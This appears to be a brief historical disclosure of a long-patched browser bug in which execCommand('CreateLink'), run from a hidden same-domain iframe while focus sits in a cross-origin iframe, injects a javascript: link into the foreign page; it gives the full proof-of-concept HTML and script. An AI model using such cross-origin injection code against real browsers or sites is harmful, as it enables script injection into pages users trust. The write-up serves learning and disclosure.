A close companion to the InsertImage finding, this one uses the CreateLink execCommand. By placing the focus in a cross-origin iframe and then invoking the command from a same-domain hidden iframe, the resulting link gets inserted into the foreign document.

<iframe name="ifrTarget" src="http://www.google.com" width="80%" height="70%"></iframe>
<iframe id="ifrExecCommand" style="display:none"></iframe>

<script language="JavaScript">
function insertLink()
{
    // Place focus in the cross-origin target
    ifrTarget.focus();

    // Use execCommand from our same-domain iframe
    ifrExecCommand.document.execCommand("CreateLink", true);
}
</script>

<input type="button" onclick="insertLink()" value="Insert Link">

Clicking the button and typing a javascript: URL into the dialog injects that link into Google’s page. Like the InsertImage case, the root issue is that execCommand respected focus rather than document ownership, allowing cross-origin injection.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.